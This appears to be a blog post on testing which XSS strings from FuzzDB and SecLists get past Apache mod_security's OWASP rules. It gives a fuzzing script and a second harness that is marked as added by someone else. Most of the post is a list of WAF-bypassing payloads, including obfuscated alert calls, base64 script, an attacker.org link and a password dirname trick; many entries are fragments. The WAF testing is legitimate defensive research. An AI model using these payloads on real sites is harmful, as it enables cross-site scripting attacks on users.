Mod_security Bypass for XSS

I wanted to do some research in the cybersecurity domain that piqued my interest. I decided to test which XSS strings from the FuzzDB and SecLists lists bypassed the mod_security OWASP ruleset on a standard Apache2 web server. I used the code shown below:

#!/usr/bin/env python
"""
Test for mod_security bypass: POST every line of a wordlist to the login
form and record the HTTP status code each one receives.
"""
# Third-party library (pip install requests).
import requests

# One candidate XSS string per line (the merged FuzzDB and SecLists lists).
with open('/root/projects/fuzzdb.txt') as f:
    content = f.read().splitlines()

url = 'http://127.0.0.1/login2.php'
results = {}  # payload -> HTTP status code
for x in content:
    payload = {'username': x, 'password': '1'}
    r = requests.post(url, data=payload)
    results[x] = r.status_code

# A 200 means the request reached the application; mod_security answers
# 403 when one of its rules matches.
for k, v in results.items():
    if v == 200:
        print(k)
        print('----------------------------------------------')

I combined all the separate XSS lists within FuzzDB and SecLists, then ran them against the login parameter of a quick PHP login script I had acquired for testing. As the preceding Python code shows, I print every string that received a 200 response code from the Apache2 server: a 200 means the string was not filtered by the WAF, which would otherwise have returned a 403 Forbidden.
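A refinement of that harness, added here as an example and not the author's code: it keeps the post's URL, form fields and wordlist path, but the stdlib urllib sender, the bucket names and the 403-only blocking assumption are mine. It separates "reached the application" (200) from "blocked by the WAF" (403) from "server error or unreachable", so a crashed backend or a timeout is not miscounted as a bypass, and it merges and deduplicates several wordlists the way the post describes.

```python
#!/usr/bin/env python3
"""Bucket fuzz results by what the server did, not just by "was it 200"."""
import sys
import urllib.error
import urllib.parse
import urllib.request

WAF_BLOCKED = {403}  # status mod_security returns when a CRS rule blocks (assumed default)
def post_form(url, fields, timeout=5):
    """POST urlencoded fields; return the HTTP status, or None on a transport error."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:  # 4xx/5xx are still verdicts from the server
        return e.code
    except urllib.error.URLError:  # refused or timed out: no verdict at all
        return None

def load_payloads(paths):
    """Merge several wordlists in order, dropping blank lines and duplicates."""
    seen, merged = set(), []
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as f:
            for line in f.read().splitlines():
                if line and line not in seen:
                    seen.add(line)
                    merged.append(line)
    return merged

def classify(payloads, url, send=post_form, field="username"):
    """Return {'passed': [...], 'blocked': [...], 'other': {status: [...]}, 'unreachable': [...]}."""
    buckets = {"passed": [], "blocked": [], "other": {}, "unreachable": []}
    for p in payloads:
        status = send(url, {field: p, "password": "1"})
        if status is None:
            buckets["unreachable"].append(p)
        elif status in WAF_BLOCKED:
            buckets["blocked"].append(p)
        elif status == 200:
            buckets["passed"].append(p)
        else:  # 5xx, 404, redirects: the application, not the WAF, decided this
            buckets["other"].setdefault(status, []).append(p)
    return buckets

if __name__ == "__main__":
    lists = sys.argv[1:] or ["/root/projects/fuzzdb.txt"]
    result = classify(load_payloads(lists), "http://127.0.0.1/login2.php")
    print("\n".join(result["passed"]), f"\nblocked={len(result['blocked'])} unreachable={len(result['unreachable'])}")
```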

If there are issues with accessing my GitHub repo below, I have a zipped file with my code, model, and datasets here: Repo Copy

Please see my GitHub for all code related to this project.

These are the XSS strings that were allowed to pass through the mod_security WAF:

'
----------------------------------------------
"
----------------------------------------------
alert(1)
----------------------------------------------
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
----------------------------------------------
'XSS')>
----------------------------------------------
'); alert('XSS
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
alert
----------------------------------------------
alert(1)
----------------------------------------------
alert(1)
----------------------------------------------
alert\\`1\\`
----------------------------------------------
alert`1`
----------------------------------------------
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
----------------------------------------------
//%0D%0A%0D%0A//
----------------------------------------------
setTimeout(location.search.slice(1));
----------------------------------------------
\'-alert(1)//
----------------------------------------------
<br><br><br><br><br><br><br><br><br><br>
----------------------------------------------
<br><br><br><br><br><br><x id=x>#x
----------------------------------------------
alert`1`
----------------------------------------------
alert&lpar;1&rpar;
----------------------------------------------
alert&#x28;1&#x29
----------------------------------------------
alert&#40;1&#41
----------------------------------------------
(alert)(1)
----------------------------------------------
a=alert,a(1)
----------------------------------------------
[1].find(alert)
----------------------------------------------
top["al"+"ert"](1)
----------------------------------------------
top[/al/.source+/ert/.source](1)
----------------------------------------------
al\u0065rt(1)
----------------------------------------------
top['al\145rt'](1)
----------------------------------------------
top['al\x65rt'](1)
----------------------------------------------
top[8680439..toString(30)](1)
----------------------------------------------
navigator.vibrate(500)
----------------------------------------------
# credit to rsnake
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
>>> vectors()
----------------------------------------------
<head>
----------------------------------------------
@font-face {font-family: y; src: url("font.svg#x") format("svg");} body {font: 100px "y";}
----------------------------------------------
</head>
----------------------------------------------
<body>Hello</body>
----------------------------------------------
 onerror CDATA "alert(67)"
----------------------------------------------
 onload CDATA "alert(2)">
----------------------------------------------
<div id="91">[A]
----------------------------------------------
[B]
----------------------------------------------
[C]
----------------------------------------------
[D]
----------------------------------------------
<feImage>
----------------------------------------------
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
----------------------------------------------
</feImage>
----------------------------------------------
*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */
----------------------------------------------
*{background:url(xx:x //**/\red/*)} /* IE 6-7 Standards mode */
----------------------------------------------
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
----------------------------------------------
<div id="113"><div id="x">XXX</div>
----------------------------------------------
#x{font-family:foo[bar;color:green;}
----------------------------------------------
#y];color:red;{}
----------------------------------------------
<div id="116"><div id="x">x</div>
----------------------------------------------
<xml:namespace prefix="t">
----------------------------------------------
<div id="117"><a href="http://attacker.org">
----------------------------------------------
    <h1>Drop me</h1>
----------------------------------------------
</div>
----------------------------------------------
function makePopups(){
----------------------------------------------
    for (i=1;i<6;i++) {
----------------------------------------------
        window.open('popup.html','spam'+i,'width=50,height=50');
----------------------------------------------
    }
----------------------------------------------
}
----------------------------------------------
<body>
----------------------------------------------
</body>
----------------------------------------------
<div id="123"><span class=foo>Some text</span>
----------------------------------------------
<a class=bar href="http://www.example.org">www.example.org</a>
----------------------------------------------
alert('foo');
----------------------------------------------
});
----------------------------------------------
alert('bar');
----------------------------------------------
<!ATTLIST xsl:stylesheet
----------------------------------------------
  id    ID    #REQUIRED>]>
----------------------------------------------
        </xsl:template>
----------------------------------------------
    <circle fill="red" r="40"></circle>
----------------------------------------------
Same effect with
----------------------------------------------
<math>
----------------------------------------------
<div id="131"><b>drag and drop one of the following strings to the drop box:</b>
----------------------------------------------
<br/><hr/>
----------------------------------------------
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
----------------------------------------------
<br>
----------------------------------------------
<input name="secret" type="password">
----------------------------------------------
</image>
----------------------------------------------
<div id="134"><xmp>
----------------------------------------------
<%
----------------------------------------------
</xmp>
----------------------------------------------
x='<%'
----------------------------------------------
alert(2)
----------------------------------------------
XXX
----------------------------------------------
<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>
----------------------------------------------
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
----------------------------------------------
</template>
----------------------------------------------
<input name="username" value="admin" />
----------------------------------------------
<input name="password" type="password" value="secret" />
----------------------------------------------
<input name="injected" value="injected" dirname="password" />
----------------------------------------------
<input type="submit">
----------------------------------------------
<circle r="400"></circle>
----------------------------------------------